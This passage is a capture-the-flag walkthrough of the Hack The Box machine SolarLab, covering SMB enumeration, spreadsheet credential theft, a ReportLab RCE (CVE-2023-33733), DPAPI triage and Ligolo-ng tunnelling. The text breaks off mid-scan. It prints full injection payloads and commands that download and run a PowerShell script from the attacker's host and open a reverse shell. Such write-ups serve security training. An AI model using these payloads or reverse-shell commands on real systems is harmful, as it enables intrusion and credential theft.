# SolarLab - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

SolarLab is a decent, medium-rated Windows machine created by [LazyTitan33](https://x.com/LazyTitan33)

The foothold involves credentials in guest-accessible SMB share and an RCE vulnerability in ReportLab PDF generator.  
Then comes more credential grabbing from SQLite3 database followed by password spraying or alternatively, CVE-2023-32315: an RCE in Openfire can be abused.  
Reuse of passwords extracted from HSQL embedded database leads to shell as Administrator.

## Initial recon

```console
opcode@debian$ sudo nmap -v -p- --min-rate 2000 10.10.11.16
Nmap scan report for 10.129.84.54
Host is up (0.18s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
6791/tcp open  hnm
```

```console
opcode@debian$ sudo nmap -sC -sV -p 80,135,139,445,6791 -oN solarlab.nmap 10.10.11.16
Nmap scan report for 10.10.11.16
Host is up (0.18s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          nginx 1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
|_http-server-header: nginx/1.24.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
6791/tcp open  http          nginx 1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-05-11T19:11:09
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_clock-skew: 2s
```

It does not seem to be a domain controller. It is likely a workstation.

The port 80 redirects to <http://solarlab.htb/> and port 6791 redirects to <http://report.solarlab.htb:6791/>
Therefore, update `/etc/hosts`:

```text
10.10.11.16 solarlab.htb report.solarlab.htb
```

<http://solarlab.htb/> is a countdown for their Instant Messenger launch.

![1](images/1.png)

It also has potential users:

```text
Alexander Knight
Claudia Springer
Blake Byte
```

<http://report.solarlab.htb:6791/> is a login page for ReportHub.

![2](images/2.png)

## SMB Enumeration

I prefer to use [NetExec](https://github.com/Pennyw0rth/NetExec) for SMB enumeration:

```console
opcode@debian$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
root@1f370aed7dae:~# echo '10.10.11.16 solarlab.htb report.solarlab.htb' >> /etc/hosts
```

Null sessions are disabled:

```console
root@1f370aed7dae:~# nxc smb 10.10.11.16 -d solarlab.htb -u '' -p '' --shares
SMB         10.10.11.16     445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [-] solarlab.htb\: STATUS_ACCESS_DENIED 
SMB         10.10.11.16     445    SOLARLAB         [-] IndexError: list index out of range
SMB         10.10.11.16     445    SOLARLAB         [-] Error enumerating shares: Error occurs while reading from remote(104)
```

Guest sessions are enabled:

```console
root@1f370aed7dae:~# nxc smb 10.10.11.16 -d solarlab.htb -u 'opcode' -p '' --shares
SMB         10.10.11.16     445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [+] solarlab.htb\opcode: (Guest)
SMB         10.10.11.16     445    SOLARLAB         [*] Enumerated shares
SMB         10.10.11.16     445    SOLARLAB         Share           Permissions     Remark
SMB         10.10.11.16     445    SOLARLAB         -----           -----------     ------
SMB         10.10.11.16     445    SOLARLAB         ADMIN$                          Remote Admin
SMB         10.10.11.16     445    SOLARLAB         C$                              Default share
SMB         10.10.11.16     445    SOLARLAB         Documents       READ            
SMB         10.10.11.16     445    SOLARLAB         IPC$            READ            Remote IPC
```

Since `IPC$` is readable, RID cycling can be performed:

```console
root@1f370aed7dae:~# nxc smb 10.10.11.16 -d solarlab.htb -u 'opcode' -p '' --rid-brute 10000
SMB         10.10.11.16     445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [+] solarlab.htb\opcode: (Guest)
SMB         10.10.11.16     445    SOLARLAB         500: SOLARLAB\Administrator (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         501: SOLARLAB\Guest (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         503: SOLARLAB\DefaultAccount (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         504: SOLARLAB\WDAGUtilityAccount (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         513: SOLARLAB\None (SidTypeGroup)
SMB         10.10.11.16     445    SOLARLAB         1000: SOLARLAB\blake (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         1001: SOLARLAB\openfire (SidTypeUser)
```

To connect to the `Documents` share, `smbclient.py` can be used:

```console
opcode@debian$ smbclient.py solarlab.htb/opcode@solarlab.htb -no-pass
Impacket v0.12.0.dev1+20240429.94657.af62accb - Copyright 2023 Fortra

Type help for list of commands
# use Documents
# ls
drw-rw-rw-          0  Fri Apr 26 20:17:14 2024 .
drw-rw-rw-          0  Fri Apr 26 20:17:14 2024 ..
drw-rw-rw-          0  Fri Apr 26 20:11:57 2024 concepts
-rw-rw-rw-        278  Fri Nov 17 18:04:54 2023 desktop.ini
-rw-rw-rw-      12793  Fri Nov 17 18:04:54 2023 details-file.xlsx
drw-rw-rw-          0  Fri Nov 17 01:06:51 2023 My Music
drw-rw-rw-          0  Fri Nov 17 01:06:51 2023 My Pictures
drw-rw-rw-          0  Fri Nov 17 01:06:51 2023 My Videos
-rw-rw-rw-      37194  Fri Apr 26 20:14:18 2024 old_leave_request_form.docx
# get details-file.xlsx
# get old_leave_request_form.docx
# cd concepts
# ls
drw-rw-rw-          0  Fri Apr 26 20:11:57 2024 .
drw-rw-rw-          0  Fri Apr 26 20:11:57 2024 ..
-rw-rw-rw-     161337  Fri Apr 26 20:11:33 2024 Training-Request-Form.docx
-rw-rw-rw-      30953  Fri Apr 26 20:11:58 2024 Travel-Request-Sample.docx
# get Training-Request-Form.docx
# get Travel-Request-Sample.docx
```

I went through all those files. Within `details-file.xlsx`, I found some credentials:

```text
Site            Account#        Username                                          Password                      Security Question                             Answer                 Email                    Other information                    
Amazon.com      101-333         Alexander.knight@gmail.com                        al;ksdhfewoiuh                What was your mother's maiden name?           Blue                   Alexander.knight@gmail.co
Pefcu           A233J           KAlexander                                        dkjafblkjadsfgl               What was your high school mascot              Pine Tree              Alexander.knight@gmail.co
Chase                           Alexander.knight@gmail.com                        d398sadsknr390                What was the name of your first pet?          corvette               Claudia.springer@gmail.co
Fidelity                        blake.byte                                        ThisCanB3typedeasily1@        What was your mother's maiden name?           Helena                 blake@purdue.edu         
Signa                           AlexanderK                                        danenacia9234n                What was your mother's maiden name?           Poppyseed muffins      Alexander.knight@gmail.coaccount number: 1925-47218-30        
                                ClaudiaS                                          dadsfawe9dafkn                What was your mother's maiden name?           yellow crayon          Claudia.springer@gmail.coaccount number: 3872-03498-45        
```

Since the only user on machine is `blake`, I tried using his password `ThisCanB3typedeasily1@` and it was valid:

```console
root@1f370aed7dae:~# nxc smb 10.10.11.16 -d solarlab.htb -u 'blake' -p 'ThisCanB3typedeasily1@' --shares
SMB         10.10.11.16     445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [+] solarlab.htb\blake:ThisCanB3typedeasily1@ 
SMB         10.10.11.16     445    SOLARLAB         [*] Enumerated shares
SMB         10.10.11.16     445    SOLARLAB         Share           Permissions     Remark
SMB         10.10.11.16     445    SOLARLAB         -----           -----------     ------
SMB         10.10.11.16     445    SOLARLAB         ADMIN$                          Remote Admin
SMB         10.10.11.16     445    SOLARLAB         C$                              Default share
SMB         10.10.11.16     445    SOLARLAB         Documents       READ            
SMB         10.10.11.16     445    SOLARLAB         IPC$            READ            Remote IPC
```

Since we have a valid set of credentials, I checked some modules on NetExec:

```console
root@1f370aed7dae:~# nxc smb 10.10.11.16 -d solarlab.htb -u 'blake' -p 'ThisCanB3typedeasily1@' -M enum_av
SMB         10.10.11.16     445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [+] solarlab.htb\blake:ThisCanB3typedeasily1@ 
ENUM_AV     10.10.11.16     445    SOLARLAB         Found Windows Defender INSTALLED

root@1f370aed7dae:~# nxc smb 10.10.11.16 -d solarlab.htb -u 'blake' -p 'ThisCanB3typedeasily1@' -M enum_ca
SMB         10.10.11.16     445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [+] solarlab.htb\blake:ThisCanB3typedeasily1@ 
```

There are no LDAP or WinRM ports exposed; information is limited.

## ReportLab RCE - CVE-2023-33733

The obtained credentials `blake:ThisCanB3typedeasily1@` did not work on <http://report.solarlab.htb:6791/>  
However, the login page can independently validate usernames. Using it, I learnt that `AlexanderK`, `BlakeB` and `ClaudiaS` were valid usernames. I tried the corresponding credentials from excel sheet and found a functional one:

```text
BlakeB:ThisCanB3typedeasily1@
```

On the ReportHub dashboard, we can fill up information and have PDFs generated for Leave Request, Training Request, Home Office Request or Travel Approval.  
Googling `Reportlab`, I learnt that it is a python library for generating PDFs.  
Running exiftool on a generated PDF reveals the same:

```console
opcode@debian$ exiftool output.pdf 
ExifTool Version Number         : 12.57
File Name                       : output.pdf
Directory                       : .
File Size                       : 260 kB
File Modification Date/Time     : 2024:07:12 09:25:41-04:00
File Access Date/Time           : 2024:07:12 09:25:49-04:00
File Inode Change Date/Time     : 2024:07:12 09:25:41-04:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Author                          : (anonymous)
Create Date                     : 2024:07:12 16:25:22-02:00
Creator                         : (unspecified)
Modify Date                     : 2024:07:12 16:25:22-02:00
Producer                        : ReportLab PDF Library - www.reportlab.com
Subject                         : (unspecified)
Title                           : (anonymous)
Trapped                         : False
Page Mode                       : UseNone
Page Count                      : 1
```

More importantly, ReportLab is vulnerable to a Remote Code Execution vulnerability: CVE-2023-33733.  
The PoC is available at <https://github.com/c53elyas/CVE-2023-33733>  
There's a character limit in all the primary field in all forms. However, on the Home Office Request, there's a secondary field for `Home Office address` which doesn't have any character limit. Therefore, I intercepted the POST request and changed the contents of `home_office_request` to:

```text
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('ping 10.10.14.185') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">opcode</font></para>
```

I received ICMP packets as a result. For RCE, I used:

```text
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell.exe IEX(IWR http://10.10.14.185:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.185 9001') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">opcode</font></para>
```

I received a shell as `blake`:

```console
PS C:\Users\blake\Documents\app> whoami
solarlab\blake
```

## Post-shell enumeration

```console
PS C:\> whoami /all

USER INFORMATION
----------------

User Name      SID
============== ==============================================
solarlab\blake S-1-5-21-3606151065-2641007806-2768514320-1000


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                     Well-known group S-1-5-3      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
```

Nothing useful here.  
It is not an active directory and [adPEAS](https://github.com/61106960/adPEAS) refuses to work.  
[PrivescCheck](https://github.com/itm4n/PrivescCheck), however, can still be used:

```console
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.185:8000/PrivescCheck.ps1 -UseBasicParsing)
PS C:\Windows\Tasks> Invoke-PrivescCheck -Extended
```

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ Non-default services                              ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about third-party services. It does so by    ┃
┃ parsing the target executable's metadata and checking        ┃
┃ whether the publisher is Microsoft.                          ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational


Name        : Openfire
DisplayName : Openfire
ImagePath   : "C:\Program Files\Openfire\bin\openfire-service.exe"
User        : .\openfire
StartMode   : Automatic

Name        : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath   : C:\Windows\System32\OpenSSH\ssh-agent.exe
User        : LocalSystem
StartMode   : Disabled

[--SNIP--]
```

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0043 - Reconnaissance                           ┃
┃ NAME     ┃ Non-default applications                          ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about non-default and third-party            ┃
┃ applications by searching the registry and the default       ┃
┃ install locations.                                           ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational

Name                          FullName
----                          --------
Microsoft                     C:\Program Files (x86)\Microsoft
Application                   C:\Program Files (x86)\Microsoft\Edge\Application
Application                   C:\Program Files (x86)\Microsoft\EdgeWebView\Application
nginx-1.24.0                  C:\Program Files (x86)\nginx-1.24.0
Java                          C:\Program Files\Java
jre-1.8                       C:\Program Files\Java\jre-1.8
Microsoft Update Health Tools C:\Program Files\Microsoft Update Health Tools
Openfire                      C:\Program Files\Openfire
RUXIM                         C:\Program Files\RUXIM
VMware                        C:\Program Files\VMware
VMware Tools                  C:\Program Files\VMware\VMware Tools
System32                      C:\Windows\System32
```

Openfire is installed on this machine

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0006 - Credential Access                        ┃
┃ NAME     ┃ Credential files                                  ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about the current user's CREDENTIAL files.   ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational


Type     : Credentials
FullPath : C:\Users\blake\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

Type     : Protect
FullPath : C:\Users\blake\AppData\Roaming\Microsoft\Protect\S-1-5-21-3606151065-2641007806-2768514320-1000\77bb673a-3695-4c64-a618-2aae6ddd71fe

Type     : Protect
FullPath : C:\Users\blake\AppData\Roaming\Microsoft\Protect\S-1-5-21-3606151065-2641007806-2768514320-1000\8397b358-53df-44e2-a75c-b59de08dd118

Type     : Protect
FullPath : C:\Users\blake\AppData\Roaming\Microsoft\Protect\S-1-5-21-3606151065-2641007806-2768514320-1000\b4c256a5-b34a-41a2-abe8-b4da3708990d
```

DPAPI credentials and masterkeys are present.  
Since we already know `blake`'s password, we can use [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI) to decrypt the masterkeys and retrieve the DPAPI credential. The compiled executable on [SharpCollection](https://github.com/Flangvik/SharpCollection) is not up-to-date and does not have all features.  
To compile the new version, clone the SharpDPAPI repo and open the solution. Right-click on the project `SharpDPAPI` in Solution Explorer and select `Properties`. Under `Application`, update target to `.NET Framework 4.8`.  
On the toolbar, set the configuration to `Release`. Then, select `SharpDPAPI` in Solution Explorer and use <kbd>Ctrl</kbd>+<kbd>B</kbd> to build.

```console
PS C:\Windows\Tasks> iwr 10.10.14.185:8000/SharpDPAPI.exe -o SharpDPAPI.exe
PS C:\Windows\Tasks> .\SharpDPAPI.exe credentials /password:ThisCanB3typedeasily1@

  __                 _   _       _ ___ 
 (_  |_   _. ._ ._  | \ |_) /\  |_) |  
 __) | | (_| |  |_) |_/ |  /--\ |  _|_ 
                |
  v1.12.0


[*] Action: User DPAPI Credential Triage

[*] Will decrypt user masterkeys with password: ThisCanB3typedeasily1@

[*] Found MasterKey : C:\Users\blake\AppData\Roaming\Microsoft\Protect\S-1-5-21-3606151065-2641007806-2768514320-1000\77bb673a-3695-4c64-a618-2aae6ddd71fe
[*] Found MasterKey : C:\Users\blake\AppData\Roaming\Microsoft\Protect\S-1-5-21-3606151065-2641007806-2768514320-1000\8397b358-53df-44e2-a75c-b59de08dd118
[*] Found MasterKey : C:\Users\blake\AppData\Roaming\Microsoft\Protect\S-1-5-21-3606151065-2641007806-2768514320-1000\b4c256a5-b34a-41a2-abe8-b4da3708990d

[*] Preferred master keys:

C:\Users\blake\AppData\Roaming\Microsoft\Protect\S-1-5-21-3606151065-2641007806-2768514320-1000:b4c256a5-b34a-41a2-abe8-b4da3708990d

[*] User master key cache:

{77bb673a-3695-4c64-a618-2aae6ddd71fe}:0672E5DC5545504435F281941BB5DD2ECC8D7A3B
{b4c256a5-b34a-41a2-abe8-b4da3708990d}:5CAA5E1746700C789AFEFF4C082C7D177D004ECD


[*] Triaging Credentials for current user


Folder       : C:\Users\blake\AppData\Local\Microsoft\Credentials\

  CredFile           : DFBE70A7E5CC19A398EBF1B96859CE5D

    guidMasterKey    : {b4c256a5-b34a-41a2-abe8-b4da3708990d}
    size             : 11120
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    LastWritten      : 5/2/2024 6:18:09 PM
    TargetName       : WindowsLive:target=virtualapp/didlogical
    TargetAlias      :
    Comment          : PersistedCredential
    UserName         : 02hnzzdadcsthtrn
    Credential       :
```

It turned out to be a dud.

```text
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ TCP endpoint servers                              ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about all the TCP ports that are in a LISTEN ┃
┃ state. Note that the associated process is also listed.      ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational

IP   Proto LocalAddress    State      PID Name
--   ----- ------------    -----      --- ----
IPv4 TCP   0.0.0.0:80      LISTENING 5936 nginx
IPv4 TCP   0.0.0.0:135     LISTENING  884 svchost
IPv4 TCP   0.0.0.0:445     LISTENING    4 System
IPv4 TCP   0.0.0.0:5040    LISTENING 1472 svchost
IPv4 TCP   0.0.0.0:5985    LISTENING    4 System
IPv4 TCP   0.0.0.0:6791    LISTENING 5936 nginx
IPv4 TCP   0.0.0.0:47001   LISTENING    4 System
IPv4 TCP   0.0.0.0:49664   LISTENING  672 lsass
IPv4 TCP   0.0.0.0:49665   LISTENING  536 wininit
IPv4 TCP   0.0.0.0:49666   LISTENING 1088 svchost
IPv4 TCP   0.0.0.0:49667   LISTENING 1608 svchost
IPv4 TCP   0.0.0.0:49668   LISTENING  656 services
IPv4 TCP   10.10.11.16:139 LISTENING    4 System
IPv4 TCP   127.0.0.1:5000  LISTENING 1344 python3.11
IPv4 TCP   127.0.0.1:5222  LISTENING 3104 openfire-service
IPv4 TCP   127.0.0.1:5223  LISTENING 3104 openfire-service
IPv4 TCP   127.0.0.1:5262  LISTENING 3104 openfire-service
IPv4 TCP   127.0.0.1:5263  LISTENING 3104 openfire-service
IPv4 TCP   127.0.0.1:5269  LISTENING 3104 openfire-service
IPv4 TCP   127.0.0.1:5270  LISTENING 3104 openfire-service
IPv4 TCP   127.0.0.1:5275  LISTENING 3104 openfire-service
IPv4 TCP   127.0.0.1:5276  LISTENING 3104 openfire-service
IPv4 TCP   127.0.0.1:7070  LISTENING 3104 openfire-service
IPv4 TCP   127.0.0.1:7443  LISTENING 3104 openfire-service
IPv4 TCP   127.0.0.1:9090  LISTENING 3104 openfire-service
IPv4 TCP   127.0.0.1:9091  LISTENING 3104 openfire-service
IPv6 TCP   [::]:135        LISTENING  884 svchost
IPv6 TCP   [::]:445        LISTENING    4 System
IPv6 TCP   [::]:5985       LISTENING    4 System
IPv6 TCP   [::]:47001      LISTENING    4 System
IPv6 TCP   [::]:49664      LISTENING  672 lsass
IPv6 TCP   [::]:49665      LISTENING  536 wininit
IPv6 TCP   [::]:49666      LISTENING 1088 svchost
IPv6 TCP   [::]:49667      LISTENING 1608 svchost
IPv6 TCP   [::]:49668      LISTENING  656 services
```

I'd have to forward those ports.  
But before that, the source code for the flask application is also available:

```console
PS C:\Users\blake\Documents\app> cat .\app.py
# app.py
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager   
import os

app = Flask(__name__)
app.secret_key = os.urandom(64)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///users.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['UPLOAD_FOLDER'] = 'c:\\users\\blake\\documents\\app\\reports'
login_manager = LoginManager(app)
login_manager.login_view = 'login'

# Import other modules with routes and configurations
from routes import *
from models import User, db
from utils import create_database

db.init_app(app)

with app.app_context():
   create_database()

# Initialize Flask-Login
@login_manager.user_loader
def load_user(user_id):
    return User.query.get(int(user_id))

app.route('/')(index)
app.route('/login', methods=['GET', 'POST'])(login)
app.route('/logout')(logout)
app.route('/dashboard')(dashboard)
app.route('/leaveRequest', methods=['GET', 'POST'])(leaveRequest)
app.route('/trainingRequest', methods=['GET', 'POST'])(trainingRequest)
app.route('/homeOfficeRequest', methods=['GET', 'POST'])(homeOfficeRequest)
app.route('/travelApprovalForm', methods=['GET', 'POST'])(travelApprovalForm)

if __name__ == "__main__":
    app.run(host="127.0.0.1", port=5000, debug=True, threaded=True)
```

To transfer the `users.db` to the VM, I set up an SMB server:

```console
opcode@debian$ smbserver.py -username opcode -password opcode -smb2support crate `pwd`
```

Add the share to the box, and transfer the file:

```console
PS C:\Users\blake\Documents\app\instance> net use \\10.10.14.185\crate opcode /user:opcode
The command completed successfully.

PS C:\Users\blake\Documents\app\instance> copy \Users\blake\Documents\app\instance\users.db  \\10.10.14.185\crate\users.db
PS C:\Users\blake\Documents\app\instance> net use \\10.10.14.185\crate /d
```

Let's peek inside:

```console
opcode@debian$ sqlite3 users.db                                                       
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
user
sqlite> select * from user;
1|blakeb|ThisCanB3typedeasily1@
2|claudias|007poiuytrewq
3|alexanderk|HotP!fireguard
```

I tried checking for password reuse for the user `openfire` and found one of those to be valid:

```console
root@1f370aed7dae:~# nxc smb 10.10.11.16 -d solarlab.htb -u 'openfire' -p 'HotP!fireguard' --shares
SMB         10.10.11.16     445    SOLARLAB         [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [+] solarlab.htb\openfire:HotP!fireguard 
SMB         10.10.11.16     445    SOLARLAB         [*] Enumerated shares
SMB         10.10.11.16     445    SOLARLAB         Share           Permissions     Remark
SMB         10.10.11.16     445    SOLARLAB         -----           -----------     ------
SMB         10.10.11.16     445    SOLARLAB         ADMIN$                          Remote Admin
SMB         10.10.11.16     445    SOLARLAB         C$                              Default share
SMB         10.10.11.16     445    SOLARLAB         Documents       READ            
SMB         10.10.11.16     445    SOLARLAB         IPC$            READ            Remote IPC
```

Since `openfire` does not belong to the `Remote Management Users` group, I used [RunasCs](https://github.com/antonioCoco/RunasCs) to obtain a shell as `openfire`:

```console
PS C:\Windows\Tasks> iwr 10.10.14.185:8000/RunasCs.exe -o RunasCs.exe
PS C:\Windows\Tasks> .\RunasCs.exe openfire 'HotP!fireguard' 'powershell.exe IEX(IWR http://10.10.14.185:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.185 9001'
```

```console
PS C:\Windows\system32> whoami
solarlab\openfire
```

## Tunneling with Ligolo-ng

However, finding the password reuse and utilizing `RunasCs` is not the intended approach on this machine. We were expected to forward the Openfire ports as `blake`. We can use [Ligolo-ng](https://github.com/nicocha30/ligolo-ng) for the same.  
I grabbed the `agent` and `proxy` binaries from <https://github.com/nicocha30/ligolo-ng/releases> and started the `proxy` on the attacker machine:

```console
opcode@debian$ sudo ./proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
WARN[0000] Using self-signed certificates               
WARN[0000] TLS Certificate fingerprint for ligolo is: EA9C5407D0A02D98DA1CA87248F1334653433A24167DF1409017ACC730A2F9DC 
INFO[0000] Listening on 0.0.0.0:11601                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

  Made in France ♥            by @Nicocha30!
  Version: 0.6.2

ligolo-ng »  
```

I created the a tun interface for `ligolo`:

```console
ligolo-ng » interface_create --name ligolo
INFO[0062] Creating a new "ligolo" interface...
INFO[0062] Interface created!
```

Then I executed the `agent` binary on victim machine:

```console
PS C:\Windows\Tasks> iwr 10.10.14.185:8000/agent.exe -o agent.exe
PS C:\Windows\Tasks> ./agent.exe -connect 10.10.14.185:11601 -ignore-cert
```

On the attacker machine, the following message shows up:

```console
ligolo-ng » INFO[0213] Agent joined.                                 name="SOLARLAB\\blake@solarlab" remote="10.10.11.16:57509"
```

Set this agent session as active:

```console
ligolo-ng » session
? Specify a session : 1 - #1 - SOLARLAB\blake@solarlab - 10.10.11.16:57509
[Agent : SOLARLAB\blake@solarlab] »  
```

The `ifconfig` command can be used to display the network configuration of the target:

```console
[Agent : SOLARLAB\blake@solarlab] » ifconfig
┌───────────────────────────────────────────────┐
│ Interface 0                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ Ethernet0 2                    │
│ Hardware MAC │ 00:50:56:b9:9a:c0              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 10.10.11.16/23                 │
└──────────────┴────────────────────────────────┘
┌──────────────────────────────────────────────┐
│ Interface 1                                  │
├──────────────┬───────────────────────────────┤
│ Name         │ Loopback Pseudo-Interface 1   │
│ Hardware MAC │                               │
│ MTU          │ -1                            │
│ Flags        │ up|loopback|multicast|running │
│ IPv6 Address │ ::1/128                       │
│ IPv4 Address │ 127.0.0.1/8                   │
└──────────────┴───────────────────────────────┘
```

Since we only want to access the local ports of currently connected agent, we need to add a route to the Ligolo-ng's magic CIDR amd start the tunnel:

```console
[Agent : SOLARLAB\blake@solarlab] » interface_add_route --name ligolo --route 240.0.0.1/32
INFO[0561] Route created.                               
[Agent : SOLARLAB\blake@solarlab] » start
[Agent : SOLARLAB\blake@solarlab] » INFO[0563] Starting tunnel to SOLARLAB\blake@solarlab   
```

After these steps, I was able to access the local ports directly on the magic IP 240.0.0.1:

```console
opcode@debian$ nmap -Pn -p 5000,5222,9090 240.0.0.1
Nmap scan report for 240.0.0.1
Host is up (0.36s latency).

PORT     STATE SERVICE
